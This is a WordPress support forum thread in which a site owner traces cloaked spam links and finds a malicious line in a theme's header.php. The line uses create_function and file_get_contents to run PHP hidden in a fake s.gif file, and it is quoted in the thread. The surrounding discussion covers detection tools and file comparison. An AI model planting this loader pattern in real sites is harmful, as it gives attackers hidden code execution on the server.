You might want to go and ask these guys for help – http://sucuri.net/
They do this for a fee, but I’m sure they can help.
Otherwise, their blog might have some info.
That’s an interesting one – especially as sucuri.net’s scan isn’t picking it up. It might be worth contacting them about it.
unmaskparasites.com, however did find the links: Scan result
Thread Starter
omatan
(@omatan)
@adpawl – i’ve seen these posts – I am looking for leads to identify this particular problem. Clearly I can try rebuilding, but that would be my last resort.
@esmi – thanks for the reference to unmaskparasites.com – didn’t know of that resource.
My main concern is being able to replicate the links on my browser – if I could do that I am certain I could identify where the breach is.
My main concern is being able to replicate the links on my browser – if I could do that I am certain I could identify where the breach is.
Try putting this into the browser:
site:seattlerueda.com viagra
https://www.google.ca/search?q=site%3Aseattlerueda.com+viagra&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
I can not reproduce this problem in my browser, but google cache help
Links are inserted before <div id=”main”>
Look first in your header.php
Try check your files by modyficacion time.
Thread Starter
omatan
(@omatan)
@zooini – this isn’t the pharma hack
adpawl – the problem is i wanted to recreate it in my broswer off the code – so I can trace how it occurs by turning things off
Seeing it in the google cache is useful to see where it occurs but doesn’t help me pinpoint which plugin or template or core area is affected. I did however look in the header of my theme and found what is likely the problem:
<?php $wp__theme_icon=@create_function('',@file_get_contents('...../s.gif'));$wp__theme_icon(); ?>
The s.gif file was some masked php code. I can’t test if that total solved it, but will wait till there is a new google cache.
Thanks.
@omatan, can you add code of this file to a service like Pastebin (pastebin.com, wordpress.pastebin.ca) then add your link to the post? Or send this file to my mail adpawl.it [ AT ] gmail.com ?
@ omatan
First go to your site in Firefox. Then see if you can view generated source. I have so many web developer add-ons for firefox, I’m not sure if it’s in the default Firefox install or not. But it will show more than just view source, especially if a site is hacked.
Second, go download freefilesync:
http://sourceforge.net/projects/freefilesync/
It will allow you to compare fresh themes/plugins/core against your current install. It will tell you which files have different content/attributes. Then use a tool like WinMerge or KDiff to see the differences within each file specifically.
Thread Starter
omatan
(@omatan)
This means that the checked is User-Agent and IP range: http://pastebin.com/gZerFJPF
Thread Starter
omatan
(@omatan)
Thanks. sneaky devils. that’t confirms what I suspected that IP addresses were checked. exactly to fool you if you used an agent switcher.
what tool do you use to deocde the php source ?
I use only my head.
…well, maybe still n++ and php – of course ;-p
